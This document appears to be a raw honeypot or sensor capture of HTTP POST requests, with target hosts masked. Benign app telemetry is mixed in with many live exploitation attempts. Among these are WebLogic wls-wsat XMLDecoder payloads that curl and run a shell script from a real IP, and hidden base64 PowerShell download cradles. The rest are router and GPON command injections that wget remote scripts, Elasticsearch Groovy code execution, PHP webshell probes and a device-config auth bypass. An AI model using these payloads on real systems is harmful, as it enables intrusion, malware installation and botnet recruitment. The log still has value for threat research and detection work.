submit_button=&change_action=&action=&commit=&ttcp_num=2&ttcp_size=2&ttcp_ip=-h `%63%64%20%2F%74%6D%70%3B%72%6D%20%2D%66%20%6E%6D%6C%74%31%2E%73%68%3B%77%67%65%74%20%2D%4F%20%6E%6D%6C%74%31%2E%73%68%20%68%74%74%70%3A%2F%2F%64%6F%6D%73%74%61%74%65%73%2E%73%75%2F%6E%6D%6C%74%31%2E%73%68%3B%63%68%6D%6F%64%20%2B%78%20%6E%6D%6C%74%31%2E%73%68%3B%2E%2F%6E%6D%6C%74%31%2E%73%68`&StartEPI=1
POST http://cfg.cml.ksmobile.com/post HTTP/1.1
Accept-Encoding: gzip
Content-Length: 1039
Content-Type: multipart/form-data; boundary=MoasYK5AI6Gk157-3l5qtxwMYWYCk5xIO
Host: cfg.cml.ksmobile.com
Connection: Keep-Alive
--MoasYK5AI6Gk157-3l5qtxwMYWYCk5xIO
Content-Disposition: form-data; name="protocver"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
1
--MoasYK5AI6Gk157-3l5qtxwMYWYCk5xIO
Content-Disposition: form-data; name="ran"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
695441
--MoasYK5AI6Gk157-3l5qtxwMYWYCk5xIO
Content-Disposition: form-data; name="sig"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
ee2fc573c4b18a2598eee301dc4602ca
--MoasYK5AI6Gk157-3l5qtxwMYWYCk5xIO
Content-Disposition: form-data; name="flag"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
0
--MoasYK5AI6Gk157-3l5qtxwMYWYCk5xIO
Content-Disposition: form-data; name="data"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
{"module":"sdk_preferences","mcc":"510","sdkver":"1.14","appname":"iswipe","did":"6ccc52a8048214f","modulever":"5","language":"in_ID","channel":"2010002546"}
--MoasYK5AI6Gk157-3l5qtxwMYWYCk5xIO--
POST /wuwu11.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 23
POST /sheep.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 44
m=die('Hello, Peppa!'.(string)(111111111*9))
POST /UD/act?1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
SOAPAction: urn:schemas-upnp-org:service:LANHostConfigManagement:1#SetDHCPServerConfigurable
Content-Type: text/xml
Host: x.x.x.x:7547
Content-Length: 420
Connection: Keep-Alive
POST /sheep.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 44
m=die('Hello, Peppa!'.(string)(111111111*9))
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
Å∂”âÃ≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îıÒY›∆√«∆fl
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0
Connection: Close
Content-Type: text/xml
Content-Length: 1195
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_131" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>cmd.exe</string>
</void>
<void index="1">
<string>/c</string>
</void>
<void index="2">
<string>Start /Min PowerShell.exe -NoP -NonI -EP ByPass -W Hidden -E JABPAFMAPQAoAEcAVwBtAGkAIABXAGkAbgAzADIAXwBPAHAAZQByAGEAdABpAG4AZwBTAHkAcwB0AGUAbQApAC4AQwBhAHAAdABpAG8AbgA7ACQAVwBDAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAFcAQwAuAEgAZQBhAGQAZQByAHMAWwAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwBdAD0AIgBQAG8AdwBlAHIAUwBoAGUAbABsAC8AVwBMACsAIAAkAE8AUwAiADsASQBFAFgAIAAkAFcAQwAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADEAMQAuADIAMwAwAC4AMgAyADkALgAyADIANgAvAGkAbQBhAGcAZQBzAC8AdABlAHMAdAAvAEQATAAuAHAAaABwACcAKQA7AA==</string>
</void>
</array>
<void method="start"/>
</void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
Ÿ√ßÃ≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îr\0Y›∆√«∆fl
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 396
Cache-Control: no-cache
RqENx9qaN2BLzfs8AEsRnq7AJiAufdaP+4+Ce/tdtC4PxwsI3StHT0gna4TO23z+aI/usg0FGMXsUinDQ9PemqpeT4cJ6SBExPImjzmlVhAtGYL7pAQ2lTQE0LAc3o8xOt61YZ5A7RAwgxCLdLfjW+lCbS+WRmciKpg+i/0zCN3PN/BjjwTwiqOJpm49UwA3fJm309N2p6MjK0Ud9VUmP+kHNEZ6umgZENG4FINxbPG6h5By2aCsECII+N2fNHl+qHsfbLGJPLIQccVWQ1u1H8funjFloXxsQYP7GkVyfGIS3NNuQ+Tl8jINkNYNO4RX9He36tsiFa0iOgORKYY1jiPSm7qv/i4WrO6K+vt5uX4ZrStKcVzCvKFFNsMI7BwHiaZ4zZyaKg==
POST http://cfg.cml.ksmobile.com/post HTTP/1.1
Accept-Encoding: gzip
Content-Length: 1019
Content-Type: multipart/form-data; boundary=oJrc9V7KsN-OwiJHN5wbsDMRPYVKO3
Host: cfg.cml.ksmobile.com
Connection: Keep-Alive
--oJrc9V7KsN-OwiJHN5wbsDMRPYVKO3
Content-Disposition: form-data; name="protocver"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
1
--oJrc9V7KsN-OwiJHN5wbsDMRPYVKO3
Content-Disposition: form-data; name="ran"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
630808
--oJrc9V7KsN-OwiJHN5wbsDMRPYVKO3
Content-Disposition: form-data; name="sig"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
8246cb21e7558e2a42d1608c891222e8
--oJrc9V7KsN-OwiJHN5wbsDMRPYVKO3
Content-Disposition: form-data; name="flag"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
0
--oJrc9V7KsN-OwiJHN5wbsDMRPYVKO3
Content-Disposition: form-data; name="data"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
{"module":"searchengine","mcc":"510","sdkver":"1.14","appname":"iswipe","did":"6ccc52a8048214f","modulever":"39","language":"in_ID","channel":"2010002546"}
--oJrc9V7KsN-OwiJHN5wbsDMRPYVKO3--
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; MASBJS; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 364
Cache-Control: no-cache
VFvkzH0XVWT5pXVD6ncKlyvowiMTsltrhTFiYo39pjtKNqkbvi62pXeze3SBIExIAFWQSrffAHvfaXV4jKWPaecEGSYkxAqUF/UEr69h6FWjsE1Yb4u2qej+yRF7EigHefe1tI5yXQH9pVMnbZM9Vy2Dgo4ELwdv7N6uUEcPITjPwqtugk+CGOirhwd6nOOiI4SIqJ1/JC9eercSl76MuVvIEXYDIsV00B32FqJy3T5O3OvVzeCNzdKrLUgQecLSKwjdZqFYpR9Qkm+V57zqP4ICBLuXfy+WL9eZ5WGnf4Jq69ZIxWZ2ATsZrtO1mpv7xl7nx3gpHTDd0cjkwgSquzu+AiBt2yVPzxq8+aZ7/rhB
POST /xx.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 47
axa=die('Hello, Peppa!'.(string)(111111111*9));
POST /getcfg.php HTTP/1.1
Accept: */*
Cookie: uid=Zd5iHiPget
Host: x.x.x.x
Content-Type: application/x-www-form-urlencoded
User-Agent: Wget(linux)
Content-Length: 60
A=A%0a_POST_SERVICES%3dDEVICE.ACCOUNT%0aAUTHORIZED_GROUP%3d1
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0
Connection: Close
Content-Type: text/xml
Content-Length: 1187
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_131" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>cmd.exe</string>
</void>
<void index="1">
<string>/c</string>
</void>
<void index="2">
<string>Start /Min PowerShell.exe -NoP -NonI -EP ByPass -W Hidden -E JABPAFMAPQAoAEcAVwBtAGkAIABXAGkAbgAzADIAXwBPAHAAZQByAGEAdABpAG4AZwBTAHkAcwB0AGUAbQApAC4AQwBhAHAAdABpAG8AbgA7ACQAVwBDAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAFcAQwAuAEgAZQBhAGQAZQByAHMAWwAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwBdAD0AIgBQAG8AdwBlAHIAUwBoAGUAbABsAC8AVwBMACAAJABPAFMAIgA7AEkARQBYACAAJABXAEMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAwADEALgAyADAAMAAuADQANQAuADcAOAAvAGkAbQBhAGcAZQBzAC8AdABlAHMAdAAvAEQATAAuAHAAaABwACcAKQA7AA==</string>
</void>
</array>
<void method="start"/>
</void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; ASJB; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 360
Cache-Control: no-cache
Vg21znQRUuXPfgHvI1iYo+b1b22QYNH+oYLx7QegrxN3ccoiKy7Mywn+9Dig4Sb8MZnlhHwbZGmKtNsLpgZMJKqlSMpxg50p7IWCOHawy0Vmrfep3CI+WJvB1Fsb+09o+UAkfvAUwpiGCZPuwyx6fKk+LvkjuxT+rK9HS5WPZSU1AlO47k0Kcjsi4qVgKPgGrjihbejxDNc3NEyNKZaK9cgV79vReyklaiv9dFDkjHS3M1B7MC7gpiB9FASaEFxNQzocz8tvdkqTVNX4m4HyVimo+VycIEtAnL/yD1rYT6JAIfkQm9SV44sW1pRWU38DIXH//vgDQ5dGSobV6u3DDg9lTXJoiWUs3fbj4+qA
POST /GponForm/diag_Form?images/ HTTP/1.1
Host: x.x.x.x:8080
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Hello, World
Content-Length: 118
XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://185.62.190.191/r+-O+->/tmp/r;sh+/tmp/r&ipv=0
POST /_search?pretty HTTP/1.1
Host: x.x.x.x:9200
User-Agent: curl/7.47.0
Accept: */*
Content-Length: 167
Content-Type: application/x-www-form-urlencoded
{
"script_fields": {
"myscript": {
"script": "java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"hostname\").getText()"
}
}
}
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
Åt(ÛÃ≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îgFY›∆√«∆fl
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
post /_search?pretty HTTP/1.1
User-Agent: Java/1.8.0_31
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Type: application/x-www-form-urlencoded
Accept-Language: zh-CN
Referer: http://x.x.x.x:9200/_search?pretty
Content-Length: 409
Host: x.x.x.x:9200
Connection: Keep-Alive
{"size":1,"script_fields": {"exp": {"script":"java.lang.Math.class.forName(\"java.io.BufferedReader\").getConstructor(java.io.Reader.class).newInstance(java.lang.Math.class.forName(\"java.io.InputStreamReader\").getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"echo qq952135763\").getInputStream())).readLines()","lang": "groovy"}}}
POST http://cfg.cml.ksmobile.com/post HTTP/1.1
Accept-Encoding: gzip
Content-Length: 1061
Content-Type: multipart/form-data; boundary=49PMBqQU7j_8apTj2fB3_oRP5OnRTOhLCLj07
Host: cfg.cml.ksmobile.com
Connection: Keep-Alive
--49PMBqQU7j_8apTj2fB3_oRP5OnRTOhLCLj07
Content-Disposition: form-data; name="protocver"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
1
--49PMBqQU7j_8apTj2fB3_oRP5OnRTOhLCLj07
Content-Disposition: form-data; name="ran"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
662978
--49PMBqQU7j_8apTj2fB3_oRP5OnRTOhLCLj07
Content-Disposition: form-data; name="sig"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
ee45257eecb4c9c565915513d7918a17
--49PMBqQU7j_8apTj2fB3_oRP5OnRTOhLCLj07
Content-Disposition: form-data; name="flag"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
0
--49PMBqQU7j_8apTj2fB3_oRP5OnRTOhLCLj07
Content-Disposition: form-data; name="data"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
{"module":"searchengine","mcc":"510","sdkver":"1.14","appname":"iswipe","did":"6ccc52a8048214f","modulever":"39","language":"in_ID","channel":"2010002546"}
--49PMBqQU7j_8apTj2fB3_oRP5OnRTOhLCLj07--
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
ÅWï◊lÃ≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îÄU,Y›∆√«∆fl
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 380
Cache-Control: no-cache
RfRclNvAYSp1Eb6SwHqcYf7+Pbi1RR4tiGb/mSheNo8PnCYvEF4Ns9cGoMTmsssUyrE1nu8troBVd96EwhAvicL+W9LOHamoChUZTPfyj1/3VIzhzBuHE1HGZqHCMBYGqXVO8xVMbJlt8LrXz8dRqZXngL9YOghtGqBliE/uym+/oCooXFqF/ie4DZZA/xHM69VILOrHhPGPBYVtWJ9bakJYCRCg3zmVhFv7aKeer7qC1/E+cG9+jyusAgzVGUP1EHeBIdsZXrFrVdKwpqDFNadfVxFtKCscNhJLBr5nHMW3wo/hVQRzGywTuOHXtwJT3A5uWtQAtcPnXVLjdedFgtX0nJ3Eb0gjasa0PPsk9J+Zf/KWHPjywGbVEQ==
POST http://cfg.cml.ksmobile.com/post HTTP/1.1
Accept-Encoding: gzip
Content-Length: 1055
Content-Type: multipart/form-data; boundary=1JxnmO3XcMMuUgsFOGOyLc9Ntl_8HqPHMTaR
Host: cfg.cml.ksmobile.com
Connection: Keep-Alive
--1JxnmO3XcMMuUgsFOGOyLc9Ntl_8HqPHMTaR
Content-Disposition: form-data; name="protocver"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
1
--1JxnmO3XcMMuUgsFOGOyLc9Ntl_8HqPHMTaR
Content-Disposition: form-data; name="ran"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
364715
--1JxnmO3XcMMuUgsFOGOyLc9Ntl_8HqPHMTaR
Content-Disposition: form-data; name="sig"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
f9641825392e158e2acdb5a33045e1ad
--1JxnmO3XcMMuUgsFOGOyLc9Ntl_8HqPHMTaR
Content-Disposition: form-data; name="flag"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
0
--1JxnmO3XcMMuUgsFOGOyLc9Ntl_8HqPHMTaR
Content-Disposition: form-data; name="data"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
{"module":"searchengine","mcc":"510","sdkver":"1.14","appname":"iswipe","did":"6ccc52a8048214f","modulever":"39","language":"in_ID","channel":"2010002546"}
--1JxnmO3XcMMuUgsFOGOyLc9Ntl_8HqPHMTaR--
POST http://check.proxyradar.com/azenv.php?auth=152313065485&a=PSCMN&i=1082785710&p=80 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close
testPost=true
POST http://hoodrunner.kiloo.com/hr_dailyquests2.php HTTP/1.1
X-Unity-Version: 4.6.5f1
Content-Type: application/x-www-form-urlencoded
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
Host: hoodrunner.kiloo.com
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Length: 13
key=ETRD177ET
POST /s.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 48
leng=die('Hello, Peppa!'.(string)(111111111*9));
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 380
Cache-Control: no-cache
QKVfxtmZbcASRoYO/UsP+a9rpQtipDSFv7jBMGSG88JNZenrBsu3aqHaCFEYyeeg9hxdxd1h+YIIuGztM+jX/LhlUmhB4WmilDMjxj5yWk3sDLffW1LrnUcpV3noyk8BhwgMhtizwL268ayZpoDdO2sQi8MJxjhhWKhQgzJ6zlUZTpxegkuHy+7ryamaSEpu8jHKZSUVrBAVB8HEdpUu6hftUT1/a3Sk4kvU2Gi/d67BXeD2UO64zWNmEdbhRezoDlbIQGCA4CGIBxCqXRj6z7t3V40JjmnOaMRPfyg3Py5RqPBczOJOizOoz4jllMPxCr861fK4+84SwTlMX6vONuTmCFTvvIG5wcEeSoIhTGTklDSnSId1B8tNsBZk
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 408
Cache-Control: no-cache
F6wNkN2ZZKZzcLyUBvbDHyVIwTp+9g3s+jfGxc/ofhk3BvtTXa4hn323TVojIYICT5bOOa0IlQOFbUOosHkW2SbqRy5S1s94qVz7FEEmGwZdYSMyjNv/9cKiYUN8WQzNDTveS/O2A2tGTAhhlb+FJOZV/n63l48/LnDam8NfzdkpbWpGvbHr+g1VKLSOJ3uiExWDKNyawmDOjo3uWlrZ7w9anwTOuRAScpP4A/TzASLg/Dw57L/wNfV4mPpt+nCltKBq8q0grup+qX+Cy/HPQhGLCBbzYmzx1KOnnaWZExTMNVbsNCJ0hsIP8IZmJuGUKd8LcePeevtZ9IuPQcnFg5u9GBqxVlzhfWbzidAyLJmEIW9swZpbT/lW8VZW02//9r53xwiydqlOnH4k9bqDcw==
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0
Connection: Close
Content-Type: text/xml
Content-Length: 1195
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_131" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>cmd.exe</string>
</void>
<void index="1">
<string>/c</string>
</void>
<void index="2">
<string>Start /Min PowerShell.exe -NoP -NonI -EP ByPass -W Hidden -E JABPAFMAPQAoAEcAVwBtAGkAIABXAGkAbgAzADIAXwBPAHAAZQByAGEAdABpAG4AZwBTAHkAcwB0AGUAbQApAC4AQwBhAHAAdABpAG8AbgA7ACQAVwBDAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAFcAQwAuAEgAZQBhAGQAZQByAHMAWwAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwBdAD0AIgBQAG8AdwBlAHIAUwBoAGUAbABsAC8AVwBMACsAIAAkAE8AUwAiADsASQBFAFgAIAAkAFcAQwAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADEAMQAuADIAMwAwAC4AMgAyADkALgAyADIANgAvAGkAbQBhAGcAZQBzAC8AdABlAHMAdAAvAEQATAAuAHAAaABwACcAKQA7AA==</string>
</void>
</array>
<void method="start"/>
</void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
POST http://check.proxyradar.com/azenv.php?auth=149538644099&a=PSCMN&i=1082769359&p=80 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close
testPost=true
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; EIE10;ENUSMSN; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 404
Cache-Control: no-cache
AF+zn3xAUXrGdISGyEUaS/63DojyYqVze4hANwIrAgQw2HVzbJI2D33z9WJVyarwLkU0P1mnQodj4IuIjpyESzKHdDSgtAOFw0FICa6VvDufyJFifSu7hwUWf/YqL8RXo3wqixkeTprq+j4ecT5t72DnerHlFdgewyRui1kVqTulectcyLYtwBsJjZitXIfpLUBFfY3FV+iWClsotmSWw7+v3Kr6UuBpelvBiwO80vYd5vF8K/GCbjUE9M/z1rGhASl7uwdemD6QzRml3yeglJxjESMdnFK7M2LyD5IvH8vjHw78ukxW5Pdmixzwf6xjrcurELqCNVAuFiW3f2YWC1sGPtmKkmndHwHAYx8wxE4tv4joXoz/8NB1C5FMg+fLzwixC/HV5UpsYBUjPbpk
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 372
Cache-Control: no-cache
